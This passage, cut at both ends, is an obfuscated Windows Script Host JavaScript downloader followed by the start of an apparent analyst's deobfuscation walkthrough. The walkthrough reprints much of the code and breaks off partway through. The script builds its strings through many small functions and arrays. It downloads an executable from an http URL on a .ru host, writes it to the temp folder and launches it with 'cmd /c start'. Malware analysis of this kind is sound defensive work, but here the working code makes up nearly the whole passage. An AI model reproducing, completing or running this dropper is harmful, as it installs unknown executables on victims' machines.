luzurnad["etyfholn"] = "t.";
luzurnad["itdyvm"] = 'ombiru';
luzurnad["zsymka"] = "hmogiqwe";
luzurnad["oxlubjy"] = "oqojfevl";
luzurnad["ukyqpi"] = "abkirxa";
return luzurnad["etyfholn"];
}
var ohhif = ['Typ', "hovxibt", "onsajqabd", "ebiqbimxo", "64801", "40052", "23202", "otuvvuxza", "nzawun"];
function usyl() {
var prohkyky3 = ["vapjom", "24087", "59596", "72094", "ti"]
return prohkyky3[4];
}
var gagy = ["52411", "ptuqlo", "vmomisn", "omdavbesbe", "70533", 100, "64644", "apodhegp", "uspyfolu"];
function ulhuj() {
var lbagnycu2 = [];
lbagnycu2["gbaxpe"] = 'Wri';
lbagnycu2["npazaxe"] = 'xrykaku';
lbagnycu2["hnulhikt"] = 'avbuzliv';
lbagnycu2["ipevvigr"] = "adnak";
lbagnycu2["fibyfhaps"] = 'aputvo';
return lbagnycu2["gbaxpe"];
}
var utamnom0 = ["giro", 'me', "76931"];
var lxyvgu = ["qurexyr", "81309", "69525", "ojodwoqg", "erybu", "r", "25482"];
function lgywny() {
var oraljy4 = [];
oraljy4["bkazyfseh"] = 'lpasu';
oraljy4["nrynu"] = 'nwubid';
oraljy4["iqnahoz"] = 'pgepad';
oraljy4["ypadacta"] = 'ipkib';
oraljy4["ehifeft"] = 'Get';
return oraljy4["ehifeft"];
}
function zululmudb6() {
var abyzj9 = [];
abyzj9["kopaj"] = "aqaffy";
abyzj9["fycex"] = "ernonwe";
abyzj9["oxuvatgu"] = "bbubdoqfi";
abyzj9["bydwo"] = 'cnygpuq';
abyzj9["mjismurum"] = "e";
return abyzj9["mjismurum"];
}
function sbedi() {
var gqejja = ["38831", "30067", 'pNa', "41057", "48810", "egoq", "exqexe", "93968", "onxumwy", "evydecy"]
return gqejja[2];
}
var culalgo = ["92888", "71980", "Ar", "lfehkyl", "zxati", "42851"];
var myhzaxn = ["levpi", 'Sc', "25748"];
function qkanutfujt() {
var jmupgalajs = ["hlugald", 'n', "98246", "89757", "yviq", "uhaxl", "72898", "54749", "sxirnatz", "23444"]
return jmupgalajs[1];
}
var vzyqifp1 = ["Get", "ynyhkux", "qoqohy"];
var etnivwoqze = ["mgilni", "77938", "ybmehfitke", "rmewge", "65972", "25482", "Sa", "31329"];
function rofxu() {
var urumpi = ['de', "93154"]
return urumpi[0];
}
function gatkyx5() {
var uxqace9 = ["le", "keqlivess", "28140", "ugzyw", "horwoh", "awucqyj", "ofdaki", "okwiz", "xytcem"]
return uxqace9[0];
}
var ysryqi = ["90147", "73137", "hoka", "48832", "leSy", "gyfocpibf"];
var idnyfij8 = ["jobwyfsa", "39382", 185, "jjimza"];
function elgybqe0() {
var ogkefbek = [".ad", "75715"]
return ogkefbek[0];
}
function lerzabhab() {
var odolxe8 = [];
odolxe8["vhexguhco"] = "ohdys";
odolxe8["pcoslyrdejb"] = "me";
odolxe8["vuji"] = "iftumjy";
odolxe8["dgemy"] = 'fozwal';
odolxe8["ucpamecsu"] = 'tuhvu';
return odolxe8["pcoslyrdejb"];
}
function urepwi() {
var lowonock = [];
lowonock["belzypu"] = 'ghysvek';
lowonock["enfaf"] = "ptujpa";
lowonock["icakk"] = "el";
return lowonock["icakk"];
}
function irifwid2() {
var qofvew = ["onyw", "XM", "hyjip", "eprizod", "qolypfum"]
return qofvew[1];
}
var oveghuqj = ["sgutawixn", "ukgabb", "42669", "re", "qvopvuzpy", "pumaq", "visgish", "59965"];
var qonijac = ["Ac", "70466", "eqoj", "edytmaxe", "jsajened"];
var gakahy = ["89526", "erobsybx", "qwuhwyvs", "35179", "xmidiza", 'Cl', "91132", "diboxe", "abaxols"];
var nolyf = ["29630", "twusryl", "rgevotw", "te."];
var tixqa3 = ["19254", "mibu", "esnijp", "HT"];
var xbanhe = ["32010", "nd", "okuzd", "91664", "30935"];
function qrawolow() {
var gfyva3 = [];
gfyva3["uzlimlop"] = "wmyjefgi";
gfyva3["bguzseko"] = "dy";
gfyva3["kwisydeq"] = 'abnita';
return gfyva3["bguzseko"];
}
function apmof() {
var shossiku6 = ["dhavneryqp", 'se', "extunimno", "50728", "64191", "onykwe", "evdomfar", "atubhufny", "86999", "axdepkocc"]
return shossiku6[1];
}
function kyfduhp9() {
var ucbas8 = ["73339", "TP", "78239"]
return ucbas8[1];
}
function nbepxebo7() {
var ysqobd7 = [];
ysqobd7["vrexhiln"] = "am";
ysqobd7["admofafdu"] = "asanreq";
ysqobd7["yhyxbyca"] = 'rodov';
return ysqobd7["vrexhiln"];
}
var wxavi4 = ["53960", "To", "ytxenbi", "ahufqa", "51322", "86510"];
var zegrolla = ["szydospy", "87961", 'us', "ocwuvcazjo", "ebup", "obehxyto", "mocefi", "uwsyw", "pukjobpi"];
var fupjyjn2 = ["ehloqari", 'St', "62367"];
var shyjabesp = ["17810", "xehuhaw", "le", "77218", "99857", "ijywu", "19892", "dtubmu", "64878"];
function gito4() {
var hihytxa2 = ["32942", "34427", "werympo", "dywtysidq", "Obje", "46865"]
return hihytxa2[4];
}
function gewyhvy5() {
var kopy3 = ["54411", "13830", "ex", "88989", "ezdixi", "vybojli"]
return kopy3[2];
}
var ogojbi9 = ["49473", "lwecqi", "42705", 'Spe', "avlabik"];
var tpexpon = ["kvezkify", "58415", "MS", "71896", "13958", "88679", "19137"];
function momvyze() {
var vluzsen = ["93167", "jfobmyrant", "Sh", "97215", "30396"]
return vluzsen[2];
}
function bjybpymmak() {
var ysimnafu = [];
ysimnafu["gwutvew"] = 'noziqwa';
ysimnafu["ijxus"] = 'ozjag';
ysimnafu["pyxivquzg"] = "on";
ysimnafu["epyti"] = "fbaxo";
ysimnafu["uxuni"] = "rtyjte";
return ysimnafu["pyxivquzg"];
}
function ojolahy4() {
var odyblo = [];
odyblo["cnaxke"] = "rabi";
odyblo["qxekwuj"] = "enkosunz";
odyblo["iqwynydg"] = "Re";
odyblo["tsoqad"] = "ysyjba";
odyblo["encihwiqf"] = "kfyjve";
return odyblo["iqwynydg"];
}
var vcyqkarj9 = ["box", "30470", "38474", "ogjut", "88574", "dlelfe", "ukuhzoxwe", "foveg", "fkufyznydw", "ocoryxi"];
function adefhi9() {
var zhyxfegwe = ["77254", "bj"]
return zhyxfegwe[1];
}
function socjyhlom0() {
var zqexu2 = [];
zqexu2["usginj"] = 'hvemijko';
zqexu2["qylac"] = "exuqox";
zqexu2["ydgetqe"] = "GE";
return zqexu2["ydgetqe"];
}
var esijy9 = ["45850", 100, "62916", "32146", "izinlyfi"];
function uzsebdypfy() {
var ecrurgaq = ["14831", 'cia', "28503", "ubkekiqs"]
return ecrurgaq[1];
}
function owutqosf5() {
var kesu = ['Na', "84350", "lihebybp"]
return kesu[0];
}
var ixjapa = ["60003", "ti", "27933", "27014", "wubxycz", "orugta", "83909"];
function elbixaqt() {
var owid7 = [];
owid7["tutdidub"] = 'udrucsav';
owid7["logebi"] = "ru/";
owid7["orobedz"] = "hyduxx";
owid7["imlarre"] = 'epappe';
owid7["ybqyvhezu"] = "uvydhajq";
return owid7["logebi"];
}
function apoljojk() {
var tzywe = ["ifon", "86894", "67475", "67879", "axvosvutr", "taliqh", "obrypsi", "51213", "nt", "33043"]
return tzywe[8];
}
function ubwydbupc() {
var fwycobzot = [];
fwycobzot["yjsulonwu"] = "fmica";
fwycobzot["vvoqxo"] = 'eruqh';
fwycobzot["hurbujt"] = "jlekxehk";
fwycobzot["ysexn"] = "sibdisti";
fwycobzot["zikumo"] = "Na";
return fwycobzot["zikumo"];
}
function ifag3() {
var bcevu3 = [];
bcevu3["unwebi"] = "opvabobr";
bcevu3["yttife"] = "jytu";
bcevu3["ypafa"] = 'pija';
bcevu3["akvatdilu"] = "g.Fi";
bcevu3["yldujoxxy"] = 'ukys';
return bcevu3["akvatdilu"];
}
function ewunta() {
var hfibotyf = [];
hfibotyf["aphecy"] = "dtobubta";
hfibotyf["sejoji"] = 'ksiniha';
hfibotyf["konaw"] = 'n';
hfibotyf["yweheto"] = "ytitxyzj";
return hfibotyf["konaw"];
}
var focvaq0 = ["72021", "ytlanpa", "81176", "avqutde", "qixkotnoc", "ve", "baqzeqy", "90063", "bgiqzon"];
function wsycli9() {
var onoztaxny0 = ["90538", "cony", "11158", "dacyty", "lxupyzymm", "kamfocvind", "t"]
return onoztaxny0[6];
}
var ucynucji0 = ["59001", "ec", "32190", "72212", "46163", "24252", "71307"];
var buvtyhe = ["74214", 778, "91132", "usilfe", "52588", "srupvukcal"];
function qbijyc() {
var svyppugwi6 = ["enrypfytsi", "61437", "51397", "htt", "80566", "86125"]
return svyppugwi6[3];
}
function ahfalo() {
var gkubuh = ["ewoza", "usfath", "yremxu", "apira", "87678", "lFo", "bdubexjej", "odorzyzi"]
return gkubuh[5];
}
var myjcigkab6 = ["ybep", "mpevgofxarm", "ohonp", "84011", "87257", WScript][5];
function xoxsebmyf() {
var nigkykh8 = [];
nigkykh8["lpivihemg"] = "oqozmes";
nigkykh8["ohawqy"] = 'xekmobze';
nigkykh8["ansycij"] = 'lde';
nigkykh8["edyguwf"] = 'ujazgotj';
return nigkykh8["ansycij"];
}
var ytuzzy4 = ["77477", "ajvixn", "fycfotp", "okemuc", "91397", "pabjoksin", "88360", 636, "13372"];
var jtytohhoqz9 = ["80093", "Scri", "21304"];
var hxoqny3 = ["fitajtanj", "54902", "30480", "75220", 'le', "99168", "80807", "ibgoly", "pume"];
function anpig() {
var ubpifm = ["28322", "83101", "gsughe", "qlebsog", "18788", "gam", "uvyldob", "iczihdo", "72024", "blatzu"]
return ubpifm[5];
}
var elgits9 = ["at", "wdasalqa"];
var psyqmomabc = ["itizi", "htetyhka", "nsicopl", "93052", "79924", 799, "hijgimtag", "jgodfi", "20828", "wfari"];
var yduv = ["90462", "cjahymutp", "32391", "ollygy", "22274", "24279", "egoq", "92190", "d."];
var fojjynb9 = ["13878", "19650", "90583", "14019", "84466", "52120", ".X", "89652"];
var cuqqywn0 = ["72744", "gu", "58492", "66141"];
function ucytw9() {
var pnicacfo0 = ["uxbybtu", "ixxizko", "58609", "14020", "e", "90766", "uhuh", "ilwev", "65482"]
return pnicacfo0[4];
}
function ibekh() {
var icqosocu4 = ["80273", "kira", "fxapuhikd", "htotycg", "20758", "lorde", "48415", "tbuhpejgem", "ML", "57863"]
return icqosocu4[8];
}
var ubyxs = ["arlemu", "53179", "ytjybcyqv", "selyqz", "46591", "72151", "67654", "th"];
function mufo0() {
var edypjyng = ['me', "idzuszuba", "iganb", "uhoj", "18882"]
return edypjyng[0];
}
var ukebt = ["53001", "24692", "72715", "L2"];
function coxxi4() {
var txidec = [];
txidec["koplabnowz"] = "udsivo";
txidec["syseptamc"] = "abit";
txidec["ujgage"] = 'ihbedygb';
txidec["omkawwo"] = 'll';
txidec["ojwoh"] = 'nule';
return txidec["omkawwo"];
}
function fihzard() {
var rendoqf0 = [];
rendoqf0["urwadaxu"] = "kurlezc";
rendoqf0["onog"] = 'en';
rendoqf0["gego"] = "vyqo";
rendoqf0["bzedy"] = 'pymxy';
rendoqf0["izix"] = "vsiskynte";
return rendoqf0["onog"];
}
var unaca = [703, "gcuwi", "ryno", "lnopu", "63526", "olkatu", "64491", "26490", "76071", "uberr"];
var zokahw = ["jugqe", 'ope', "osvatiki", "53293"];
function lires() {
var pumu = [];
pumu["cynmuct"] = "/c";
pumu["bytaqn"] = 'ydben';
pumu["gcebgut"] = "oguw";
pumu["emgytv"] = "olsoz";
return pumu["cynmuct"];
}
var ihdynkiri = ["s", "37570", "78532", "96473", "95345"];
function pyjxu() {
var izwitf = [];
izwitf["lwahhywte"] = "myzo";
izwitf["yhciqabxy"] = "evdohet";
izwitf["tqyhdogh"] = 'efgybuqw';
izwitf["onkubohro"] = "scahiri";
izwitf["awawqa"] = "cr";
return izwitf["awawqa"];
}
function gipertug9() {
var qolis2 = ["scuhibd", "npadi", "sepugp", "38920", "59978", "wmydkipogc", "d"]
return qolis2[6];
}
function mywoxd() {
var kxatmomk = ["44899", "yzluxtob", "objaxqalv", "xoxymydz", "hepina", "25635", "85528", "ng", "30722"]
return kxatmomk[7];
}
function ybufbedu4() {
var uqpupj = ["74845", "gyva", "18430", "48603", "ygrokgiwh", "98146", "98703", "e ", "ercydgiwxy", "xyjqi"]
return uqpupj[7];
}
var enibji = ["zragux", "quxaxs", "vetrur", "e", "47408", "efmacyzb"];
function incejpoki() {
var sirsen6 = ["si", "16068", "75326", "nafkadpaj"]
return sirsen6[0];
}
var enyrzo = ["62464", "obyri", "64768", "un4", "pevu", "tahowwajd", "81947"];
var wisore5 = ["81705", "28902", 'te', "afjygza", "62864", "afsewsi"];
function qzyjygde2() {
var darwisyd6 = [];
darwisyd6["imtuzyhsi"] = 'ozej';
darwisyd6["awejhifwo"] = "obvobukt";
darwisyd6["yjzohopz"] = 'te';
darwisyd6["wsepef"] = 'yrrytu';
darwisyd6["hatu"] = 'izdarewv';
return darwisyd6["yjzohopz"];
}
var ojeqono = ["dibeci", "84357", "47825", "39853", "dasfewep", "xubujq", "76347", "se"];
function ekzodi9() {
var dolguwvah = ["atbefujpi", "cgecbujo", "oldijo", 'Fi']
return dolguwvah[3];
}
function amernus() {
var xebbyfv7 = ["ksinbaj", "mpupu", 'Fi']
return xebbyfv7[2];
}
function irdulxy6() {
var fqozal8 = ["avyxsire", "cvijkot", "86382", "muhso", "53164", "62783", " ", "36477", "qugdalwe", "58516"]
return fqozal8[6];
}
function okymeln() {
var udcubfapbo = [];
udcubfapbo["fjotwekon"] = "pt";
udcubfapbo["jkinid"] = "lykorf";
udcubfapbo["olcujjo"] = "bejihti";
udcubfapbo["vlawa"] = 'rkirald';
udcubfapbo["bovybri"] = 'ozqodgyhr';
return udcubfapbo["fjotwekon"];
}
function ivugniva9() {
var mefanp = [];
mefanp["gdavy"] = 'iflisg';
mefanp["apadj"] = "irusu";
mefanp["opubgeg"] = "verkyl";
mefanp["yvrasuhl"] = 'onyfg';
mefanp["vogwav"] = "St";
return mefanp["vogwav"];
}
function fzerutu() {
var ifefne6 = [];
ifefne6["rnergywr"] = "me";
ifefne6["sydfazefv"] = 'yjnetx';
ifefne6["wona"] = 'yraqh';
return ifefne6["rnergywr"];
}
var ahuxaju3 = ["jolze", "efahj", "ult", "98019", "utacora", "jakmuqz", "uwsybrute", "50777", "16109"];
function igubijbi8() {
var peskuxroqk = ["30389", "WS"]
return peskuxroqk[1];
}
function yfvirz6() {
var qwykygid6 = [];
qwykygid6["obumg"] = 'ujkehfy';
qwykygid6["yszagr"] = "cm";
qwykygid6["coxca"] = "zwivov";
return qwykygid6["yszagr"];
}
var tfirsek = ["p:/", "gryhcaw", "31267", "ohuzki"];
function jtujekofq3() {
var kmexrajy0 = [];
kmexrajy0["intyjsabz"] = "cgafsacy";
kmexrajy0["epquku"] = "bsokhuny";
kmexrajy0["bqiwysme"] = "B.";
kmexrajy0["hnipdenpe"] = "asutjig";
return kmexrajy0["bqiwysme"];
}
var jarxid = ["zufatly", 've', "69796", "44204", "afodzuwa", "64212", "wsungowwa", "ujjijegj", "ixesyxle", "imdomce"];
function wleno5() {
var lisot7 = [];
lisot7["atvamx"] = 'qedmi';
lisot7["rkacokom"] = "os";
lisot7["essokviqp"] = "zuqda";
lisot7["qecy"] = 'ocela';
lisot7["coci"] = "ctuxla";
return lisot7["rkacokom"];
}
var uxardykv5 = ['\\\\', "jhibembyt"];
function isqadozve5() {
var ozgyfja = [];
ozgyfja["fqottyryw"] = "izbize";
ozgyfja["ibewki"] = "efoctu";
ozgyfja["ygig"] = 'ddujisy';
ozgyfja["upukopso"] = "der";
ozgyfja["zersykca"] = 'yrtuwib';
return ozgyfja["upukopso"];
}
function ucypygg() {
var ajvuzqom = ["sp", "lfujezo", "50274", "54052", "tiky"]
return ajvuzqom[0];
}
function ikirsime0() {
var ytorozta8 = ["riku", "86590", "tqegkebgo", "99204", "98256", "ixyj", ".ex", "owneswudo", "38360"]
return ytorozta8[6];
}
function onagij() {
var mufy6 = [];
mufy6["gkyxe"] = 'ufagk';
mufy6["ubwymk"] = 'ri';
mufy6["jusraxc"] = "wuddoke";
mufy6["yqinsy"] = 'ojhyz';
return mufy6["ubwymk"];
}
function tubvy() {
var ilizibo = ["99315", "46571", "72254", "93300", "jninuvc", myhzaxn[1] + onagij() + okymeln() + tsapapte4[6] + coxxi4() + owutqosf5() + mufo0()]
return ilizibo[5];
}
function yxubuhu() {
var zhirbiw4 = ["ussitgaby", "73969", "38268", "ultukkihy", "mliplu", eqdakn7[1] + fihzard(), "yludiw", "39046"]
return zhirbiw4[5];
}
function lymuvh() {
var hysdavy = [];
hysdavy["keku"] = vijtikuwm() + incejpoki() + ixjapa[1] + bjybpymmak();
hysdavy["abzan"] = 'usnuxqok';
hysdavy["aqjajo"] = 'ofoxu';
hysdavy["kebykvy"] = 'khypkexry';
hysdavy["mittete"] = "yxxefa";
return hysdavy["keku"];
}
function ackogyngu() {
var wberaquz = ["47357", "jabo", "87884", zokahw[1] + ewunta()]
return wberaquz[3];
}
function hwontyna() {
var hlapde = [];
hlapde["ripu"] = lgywny() + ogojbi9[3] + uzsebdypfy() + ahfalo() + xoxsebmyf() + lxyvgu[5];
hlapde["ibjylw"] = 'osniqo';
hlapde["zgope"] = "loti";
hlapde["otoh"] = 'ygbizolf';
return hlapde["ripu"];
}
function yretby5() {
var ufxibdaq = [];
ufxibdaq["stylguh"] = "ftoziznu";
ufxibdaq["appihhiru"] = vzyqifp1[0] + cgyhi[1] + sbedi() + utamnom0[1];
ufxibdaq["npukgysog"] = 'amteh';
ufxibdaq["lehfytp"] = "umotse";
ufxibdaq["nbotxikqy"] = "lperceq";
return ufxibdaq["appihhiru"];
}
function hojy3() {
var dwedy2 = [];
dwedy2["icriwmez"] = ohhif[0] + ucytw9();
dwedy2["vkazehi"] = 'orsegda';
dwedy2["ccyqimwa"] = 'haskecy';
dwedy2["uciwl"] = 'ride';
return dwedy2["icriwmez"];
}
function ydugo0() {
var uqsahhexga = [];
uqsahhexga["qrelqyql"] = apmof() + xbanhe[1];
uqsahhexga["eqxygduc"] = "arildowb";
uqsahhexga["gsylohakt"] = 'uqycvel';
return uqsahhexga["qrelqyql"];
}
function lsexnukmojn5() {
var ymelhexg = [];
ymelhexg["oqibw"] = "vini";
ymelhexg["mluhsynpu"] = "yqomy";
ymelhexg["bhabymko"] = 'fitgi';
ymelhexg["rdahse"] = fupjyjn2[1] + elgits9[0] + zegrolla[2];
ymelhexg["vcovbehylh"] = 'igovgy';
return ymelhexg["rdahse"];
}
function jwesifr0() {
var nanex = ["pgadla", "abeslimxa", ulhuj() + qzyjygde2(), "89931"]
return nanex[2];
}
function hogkevitm0() {
var gohakxu = [];
gohakxu["vsebe"] = 'exdyth';
gohakxu["ecnorfo"] = "ruwsyddu";
gohakxu["bvojul"] = 'buwse';
gohakxu["dygyj"] = ojolahy4() + ucypygg() + ewzeq5() + ojeqono[7] + ufmotuz0() + qrawolow();
gohakxu["hissift"] = "ugonf";
return gohakxu["dygyj"];
}
function jutu0() {
var zucna = [etnivwoqze[6] + jarxid[1] + wxavi4[1] + ekzodi9() + shyjabesp[2], "jnahhopjef", "64635"]
return zucna[0];
}
function isiqku2() {
var xmoty = [];
xmoty["nelpoqjez"] = "typud";
xmoty["siqi"] = gakahy[5] + wleno5() + zululmudb6();
xmoty["znidtysi"] = "byvmy";
xmoty["lecuzo"] = "sorxobo";
return xmoty["siqi"];
}
function amjugaxqa8() {
var zciqli4 = [];
zciqli4["uwep"] = "gmigex";
zciqli4["iqube"] = "feboqda";
zciqli4["swytyt"] = ycharara6[5] + qkanutfujt();
zciqli4["dyjunw"] = "vkomvi";
return zciqli4["swytyt"];
}
function zaddeqpa0() {
var yqyww = [];
yqyww["gqoqusy"] = "duquqc";
yqyww["labnitdo"] = 'miba';
yqyww["volqy"] = rofxu() + udfoxsovz[5] + wisore5[2] + amernus() + hxoqny3[4];
yqyww["kolbatezz"] = 'imorj';
return yqyww["volqy"];
}
try {
var eqnok2 = myjcigkab6;
if (!eqnok2[culalgo[2] + cuqqywn0[1] + fzerutu() + apoljojk() + ihdynkiri[0]][ubwydbupc() + lerzabhab() + gipertug9()][gatkyx5() + mywoxd() + ubyxs[7]]) {
var siga88 = eval(qonijac[0] + usyl() + focvaq0[5] + miqypce2[6] + adefhi9() + ucynucji0[1] + wsycli9());
}
var wjerco = jtytohhoqz9[1] + ifbow() + ifag3() + ysryqi[4] + izyq0() + gito4() + nzisyjs8[3];
var vihtew9 = bygpufo[0] + osubcy0[1] + jtujekofq3() + ivugniva9() + oveghuqj[3] + nbepxebo7();
var uglahup = tpexpon[2] + irifwid2() + ukebt[3] + fojjynb9[6] + ibekh() + tixqa3[3] + kyfduhp9();
var azjod = new siga88(vihtew9);
var urrigucx = new siga88(wjerco);
var opcakco = new siga88(uglahup);
var uffyvqo = qbijyc() + tfirsek[0] + sbogewob0[1] + zbyxizi5() + isqadozve5() + elgybqe0() + ahuxaju3[2] + anpig() + ogxetjowy() + nolyf[3] + elbixaqt() + tokoful8() + vcyqkarj9[0] + enyrzo[3] + ikirsime0() + enibji[3];
var mysfefyg = eqnok2[tubvy()];
azjod[yxubuhu()]();
var areglaly8 = igubijbi8() + pyjxu() + utes1() + unolodx() + momvyze() + urepwi() + fkuwyqu[0];
azjod[lymuvh()] = spudni0[4] - idnyfij8[2];
opcakco[ackogyngu()](socjyhlom0() + ovuz[0], uffyvqo, unaca[0] - unafme[3]);
var yzysa = urrigucx[hwontyna()](buvtyhe[1] - 776) + uxardykv5[0] + urrigucx[yretby5()]();
azjod[hojy3()] = ytuzzy4[7] - 635;
opcakco[ydugo0()]();
var imytalir = yfvirz6() + yduv[8] + gewyhvy5() + ybufbedu4() + lires() + irdulxy6() + yzysa;
if (opcakco[lsexnukmojn5()] == psyqmomabc[5] - 599) {
var zofa1 = new siga88(areglaly8);
azjod[jwesifr0()](opcakco[hogkevitm0()]);
azjod[jutu0()](yzysa);
azjod[isiqku2()]();
zofa1[amjug_axqa8()](imytalir, unaca[0] - unafme[3]);
}
urrigucx[zaddeqpa0()](mysfefyg);
} catch (yhvuhnybu2) {}
Obfuscation : Important strings used to constructs objects, methods, paths are build by function calls / concatenation
- you can't find by simple "find" tool any part( easy to find in a lot of obfuscated scripts) : open; write, ActiveXObject , etc,
- there isn't a "quick first obfuscation step" with second obfuscation method, etc...
2) Let's deobfuscate it :
First step : put in first the var that are out of functions, and at the end the functions
var bygpufo = ["AD", "67778", "lkikatk", "udoj", "12323", "39378", "adnuxfe", "58453", "72505"];
var unafme = ["omyf", "61453", "qetsu", 703];
var ycharara6 = ["igygo", "fxanap", "tvalu", "yffevmorp", "yrikyfa", 'ru', "67080", "yjamu"];
var nzisyjs8 = ["xpyxsu", "amruq", "46708", "ct"];
var sbogewob0 = ["13898", "/re", "xexrejy"];
var udfoxsovz = ["62573", "82790", "86374", "90081", "yqebcyh", "le", "84249", "28400", "91602"];
var spudni0 = ["74499", "ylutfafb", "14321", "66448", 185, "ehtequjse", "68786", "83022", "95621"];
var cgyhi = ["jmuretx", "Tem"];
var ovuz = ["T", "kxijpusyl"];
var tsapapte4 = ["85561", "86025", "52842", "49322", "41374", "87951", "Fu", "29050", "vuxe"];
var fkuwyqu = ["l", "tycefi"];
var wxavi4 = ["53960", "To", "ytxenbi", "ahufqa", "51322", "86510"];
var zegrolla = ["szydospy", "87961", 'us', "ocwuvcazjo", "ebup", "obehxyto", "mocefi", "uwsyw", "pukjobpi"];
var fupjyjn2 = ["ehloqari", 'St', "62367"];
var shyjabesp = ["17810", "xehuhaw", "le", "77218", "99857", "ijywu", "19892", "dtubmu", "64878"];
var myjcigkab6 = ["ybep", "mpevgofxarm", "ohonp", "84011", "87257", WScript][5];
ytuzzy4 = ["77477", "ajvixn", "fycfotp", "okemuc", "91397", "pabjoksin", "88360", 636, "13372"];
var jtytohhoqz9 = ["80093", "Scri", "21304"];
var hxoqny3 = ["fitajtanj", "54902", "30480", "75220", 'le', "99168", "80807", "ibgoly", "pume"];
var elgits9 = ["at", "wdasalqa"];
var psyqmomabc = ["itizi", "htetyhka", "nsicopl", "93052", "79924", 799, "hijgimtag", "jgodfi", "20828", "wfari"];
var yduv = ["90462", "cjahymutp", "32391", "ollygy", "22274", "24279", "egoq", "92190", "d."];
var fojjynb9 = ["13878", "19650", "90583", "14019", "84466", "52120", ".X", "89652"];
var cuqqywn0 = ["72744", "gu", "58492", "66141"];
var ukebt = ["53001", "24692", "72715", "L2"];
var unaca = [703, "gcuwi", "ryno", "lnopu", "63526", "olkatu", "64491", "26490", "76071", "uberr"];
var zokahw = ["jugqe", 'ope', "osvatiki", "53293"];
var ihdynkiri = ["s", "37570", "78532", "96473", "95345"];
var enibji = ["zragux", "quxaxs", "vetrur", "e", "47408", "efmacyzb"];
var enyrzo = ["62464", "obyri", "64768", "un4", "pevu", "tahowwajd", "81947"];
var wisore5 = ["81705", "28902", 'te', "afjygza", "62864", "afsewsi"];
var ojeqono = ["dibeci", "84357", "47825", "39853", "dasfewep", "xubujq", "76347", "se"];
var ahuxaju3 = ["jolze", "efahj", "ult", "98019", "utacora", "jakmuqz", "uwsybrute", "50777", "16109"];
var tfirsek = ["p:/", "gryhcaw", "31267", "ohuzki"];
var jarxid = ["zufatly", 've', "69796", "44204", "afodzuwa", "64212", "wsungowwa", "ujjijegj", "ixesyxle", "imdomce"];
var uxardykv5 = ['\\\\', "jhibembyt"];
var unafme = ["omyf", "61453", "qetsu", 703];
var ycharara6 = ["igygo", "fxanap", "tvalu", "yffevmorp", "yrikyfa", 'ru', "67080", "yjamu"];
var nzisyjs8 = ["xpyxsu", "amruq", "46708", "ct"];
var sbogewob0 = ["13898", "/re", "xexrejy"];
var udfoxsovz = ["62573", "82790", "86374", "90081", "yqebcyh", "le", "84249", "28400", "91602"];
var spudni0 = ["74499", "ylutfafb", "14321", "66448", 185, "ehtequjse", "68786", "83022", "95621"];
var cgyhi = ["jmuretx", "Tem"];
var ovuz = ["T", "kxijpusyl"];
var tsapapte4 = ["85561", "86025", "52842", "49322", "41374", "87951", "Fu", "29050", "vuxe"];
var fkuwyqu = ["l", "tycefi"];
var wxavi4 = ["53960", "To", "ytxenbi", "ahufqa", "51322", "86510"];
var zegrolla = ["szydospy", "87961", 'us', "ocwuvcazjo", "ebup", "obehxyto", "mocefi", "uwsyw", "pukjobpi"];
var fupjyjn2 = ["ehloqari", 'St', "62367"];
var shyjabesp = ["17810", "xehuhaw", "le", "77218", "99857", "ijywu", "19892", "dtubmu", "64878"];
var myjcigkab6 = ["ybep", "mpevgofxarm", "ohonp", "84011", "87257", WScript][5];
ytuzzy4 = ["77477", "ajvixn", "fycfotp", "okemuc", "91397", "pabjoksin", "88360", 636, "13372"];
var jtytohhoqz9 = ["80093", "Scri", "21304"];
var hxoqny3 = ["fitajtanj", "54902", "30480", "75220", 'le', "99168", "80807", "ibgoly", "pume"];
var elgits9 = ["at", "wdasalqa"];
var psyqmomabc = ["itizi", "htetyhka", "nsicopl", "93052", "79924", 799, "hijgimtag", "jgodfi", "20828", "wfari"];
var yduv = ["90462", "cjahymutp", "32391", "ollygy", "22274", "24279", "egoq", "92190", "d."];
var fojjynb9 = ["13878", "19650", "90583", "14019", "84466", "52120", ".X", "89652"];
var cuqqywn0 = ["72744", "gu", "58492", "66141"];
var ukebt = ["53001", "24692", "72715", "L2"];
var unaca = [703, "gcuwi", "ryno", "lnopu", "63526", "olkatu", "64491", "26490", "76071", "uberr"];
var zokahw = ["jugqe", 'ope', "osvatiki", "53293"];
var ihdynkiri = ["s", "37570", "78532", "96473", "95345"];
var enibji = ["zragux", "quxaxs", "vetrur", "e", "47408", "efmacyzb"];
var enyrzo = ["62464", "obyri", "64768", "un4", "pevu", "tahowwajd", "81947"];
var wisore5 = ["81705", "28902", 'te', "afjygza", "62864", "afsewsi"];
var ojeqono = ["dibeci", "84357", "47825", "39853", "dasfewep", "xubujq", "76347", "se"];
var ahuxaju3 = ["jolze", "efahj", "ult", "98019", "utacora", "jakmuqz", "uwsybrute", "50777", "16109"];
var tfirsek = ["p:/", "gryhcaw", "31267", "ohuzki"];
var jarxid = ["zufatly", 've', "69796", "44204", "afodzuwa", "64212", "wsungowwa", "ujjijegj", "ixesyxle", "imdomce"];
var uxardykv5 = ['\\\\', "jhibembyt"];
function ogxetjowy() {
var dazfeb = [];
dazfeb["uboxyre"] = 'reqetdo';
dazfeb["nukjojg"] = "awetlowf";
dazfeb["dywxissy"] = "esi";
return dazfeb["dywxissy"];
}
function izyq0() {
var ewydsuh6 = [];
ewydsuh6["pyzezgahz"] = "stem";
ewydsuh6["egdive"] = 'yzywbo';
ewydsuh6["alebo"] = "ycamm";
ewydsuh6["odmijibx"] = 'ajevisz';
ewydsuh6["jakonbajn"] = 'ilit';
return ewydsuh6["pyzezgahz"];
}
function zbyxizi5() {
var jahifa = [];
jahifa["icacy"] = 'izval';
jahifa["cbegeqsa"] = "wor";
jahifa["adfajawa"] = "some";
jahifa["ivgijgo"] = "uhvyhy";
return jahifa["cbegeqsa"];
}
function elbixaqt() {
var owid7 = [];
owid7["tutdidub"] = 'udrucsav';
owid7["logebi"] = "ru/";
owid7["orobedz"] = "hyduxx";
owid7["imlarre"] = 'epappe';
owid7["ybqyvhezu"] = "uvydhajq";
return owid7["logebi"];
}
function apoljojk() {
var tzywe = ["ifon", "86894", "67475", "67879", "axvosvutr", "taliqh", "obrypsi", "51213", "nt", "33043"]
return tzywe[8];
}
function ubwydbupc() {
var fwycobzot = [];
fwycobzot["yjsulonwu"] = "fmica";
fwycobzot["vvoqxo"] = 'eruqh';
fwycobzot["hurbujt"] = "jlekxehk";
fwycobzot["ysexn"] = "sibdisti";
fwycobzot["zikumo"] = "Na";
